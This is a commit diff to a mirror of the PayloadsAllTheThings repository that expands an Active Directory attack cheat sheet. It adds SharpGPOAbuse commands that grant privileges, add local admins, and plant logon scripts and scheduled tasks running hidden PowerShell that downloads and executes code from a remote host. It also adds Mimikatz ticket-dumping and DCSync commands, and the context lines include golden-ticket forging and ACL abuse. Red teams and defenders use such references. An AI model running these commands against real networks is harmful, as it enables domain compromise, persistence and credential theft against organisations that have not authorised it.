mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 15:14:34 +00:00
Kerberos AD GPO
This commit is contained in:
parent
b052f78d95
commit
73abdeed71
1 changed files with 40 additions and 6 deletions
|
@ -10,6 +10,7 @@
|
||||||
- [Open Shares](#open-shares)
|
- [Open Shares](#open-shares)
|
||||||
- [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share)
|
- [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share)
|
||||||
- [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences)
|
- [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences)
|
||||||
|
- [Exploit Group Policy Objects GPO](#exploit-group-policy-objects-gpo)
|
||||||
- [Dumping AD Domain Credentials](#dumping-ad-domain-credentials)
|
- [Dumping AD Domain Credentials](#dumping-ad-domain-credentials)
|
||||||
- [Using ndtsutil](#using-ndtsutil)
|
- [Using ndtsutil](#using-ndtsutil)
|
||||||
- [Using Vshadow](#using-vshadow)
|
- [Using Vshadow](#using-vshadow)
|
||||||
|
@ -47,13 +48,13 @@
|
||||||
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
|
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
|
||||||
- [Trust relationship between domains](#trust-relationship-between-domains)
|
- [Trust relationship between domains](#trust-relationship-between-domains)
|
||||||
- [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
|
- [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
|
||||||
- [Unconstrained delegation](#unconstrained-delegation)
|
- [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation)
|
||||||
- [Find delegation](#find-delegation)
|
- [Find delegation](#find-delegation)
|
||||||
- [Monitor with Rubeus](#monitor-with-rubeus)
|
- [Monitor with Rubeus](#monitor-with-rubeus)
|
||||||
- [Force a connect back from the DC](#force-a-connect-back-from-the-dc)
|
- [Force a connect back from the DC](#force-a-connect-back-from-the-dc)
|
||||||
- [Load the ticket](#load-the-ticket)
|
- [Load the ticket](#load-the-ticket)
|
||||||
- [Mitigation](#mitigation)
|
- [Mitigation](#mitigation)
|
||||||
- [Resource-Based Constrained Delegation](#resource-based-constrained-delegation)
|
- [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation)
|
||||||
- [Relay delegation with mitm6](#relay-delegation-with-mitm6)
|
- [Relay delegation with mitm6](#relay-delegation-with-mitm6)
|
||||||
- [PrivExchange attack](#privexchange-attack)
|
- [PrivExchange attack](#privexchange-attack)
|
||||||
- [PXE Boot image attack](#pxe-boot-image-attack)
|
- [PXE Boot image attack](#pxe-boot-image-attack)
|
||||||
|
@ -389,6 +390,23 @@ Get-NetGPOGroup
|
||||||
* Delete existing GPP xml files in SYSVOL containing passwords.
|
* Delete existing GPP xml files in SYSVOL containing passwords.
|
||||||
* Don’t put passwords in files that are accessible by all authenticated users.
|
* Don’t put passwords in files that are accessible by all authenticated users.
|
||||||
|
|
||||||
|
### Exploit Group Policy Objects GPO
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# Adding User Rights
|
||||||
|
SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO"
|
||||||
|
|
||||||
|
# Adding a Local Admin
|
||||||
|
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"
|
||||||
|
|
||||||
|
# Configuring a User or Computer Logon Script
|
||||||
|
SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
|
||||||
|
|
||||||
|
# Configuring a Computer or User Immediate Task
|
||||||
|
SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
### Dumping AD Domain Credentials
|
### Dumping AD Domain Credentials
|
||||||
|
|
||||||
You will need the following files to extract the ntds :
|
You will need the following files to extract the ntds :
|
||||||
|
@ -1011,6 +1029,12 @@ Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccount
|
||||||
Add-ObjectACL -TargetDistinguishedName "dc=dev,dc=testlab,dc=local" -PrincipalSamAccountName titi -Rights DCSync
|
Add-ObjectACL -TargetDistinguishedName "dc=dev,dc=testlab,dc=local" -PrincipalSamAccountName titi -Rights DCSync
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Check ACL for an User with [ADACLScanner](https://github.com/canix1/ADACLScanner).
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtree -EffectiveRightsPrincipal User1 -Output HTML -Show
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
### Trust relationship between domains
|
### Trust relationship between domains
|
||||||
|
|
||||||
|
@ -1047,10 +1071,17 @@ Prerequisite:
|
||||||
kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt
|
kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt
|
||||||
```
|
```
|
||||||
|
|
||||||
### Unconstrained delegation
|
### Kerberos Unconstrained Delegation
|
||||||
|
|
||||||
> The user sends a TGS to access the service, along with their TGT, and then the service can use the user’s TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
|
> The user sends a TGS to access the service, along with their TGT, and then the service can use the user’s TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
|
||||||
|
|
||||||
|
Domain Compromise via DC Print Server and Unconstrained Delegation
|
||||||
|
|
||||||
|
Prerequisites:
|
||||||
|
- Object with Property "Trust this computer for delegation to any service (Kerberos only)"
|
||||||
|
- Must have ADS_UF_TRUSTED_FOR_DELEGATION
|
||||||
|
- Must not have ADS_UF_NOT_DELEGATED flag
|
||||||
|
|
||||||
#### Find delegation
|
#### Find delegation
|
||||||
|
|
||||||
Check the `TrustedForDelegation` property.
|
Check the `TrustedForDelegation` property.
|
||||||
|
@ -1097,7 +1128,9 @@ Extract the base64 TGT from Rubeus output and load it to our current session.
|
||||||
.\Rubeus.exe asktgs /ticket:<ticket base64> /ptt
|
.\Rubeus.exe asktgs /ticket:<ticket base64> /ptt
|
||||||
```
|
```
|
||||||
|
|
||||||
Then you can use DCsync or another attack : `Mimikatz> lsadump::dcsync /user:HACKER\krbtgt`
|
Alternatively you could also grab the ticket using Mimikatz : `mimikatz # sekurlsa::tickets`
|
||||||
|
|
||||||
|
Then you can use DCsync or another attack : `mimikatz # lsadump::dcsync /user:HACKER\krbtgt`
|
||||||
|
|
||||||
|
|
||||||
#### Mitigation
|
#### Mitigation
|
||||||
|
@ -1105,7 +1138,7 @@ Then you can use DCsync or another attack : `Mimikatz> lsadump::dcsync /user:HAC
|
||||||
* Ensure sensitive accounts cannot be delegated
|
* Ensure sensitive accounts cannot be delegated
|
||||||
* Disable the Print Spooler Service
|
* Disable the Print Spooler Service
|
||||||
|
|
||||||
### Resource-Based Constrained Delegation
|
### Kerberos Resource Based Constrained Delegation
|
||||||
|
|
||||||
Resource-based Constrained Delegation was introduced in Windows Server 2012.
|
Resource-based Constrained Delegation was introduced in Windows Server 2012.
|
||||||
|
|
||||||
|
@ -1469,4 +1502,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5
|
||||||
* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic)
|
* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic)
|
||||||
* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https:/www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/)
|
* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https:/www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/)
|
||||||
* [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/)
|
* [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/)
|
||||||
* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
|
* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
|
||||||
|
* [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179)
|
Loading…
Reference in a new issue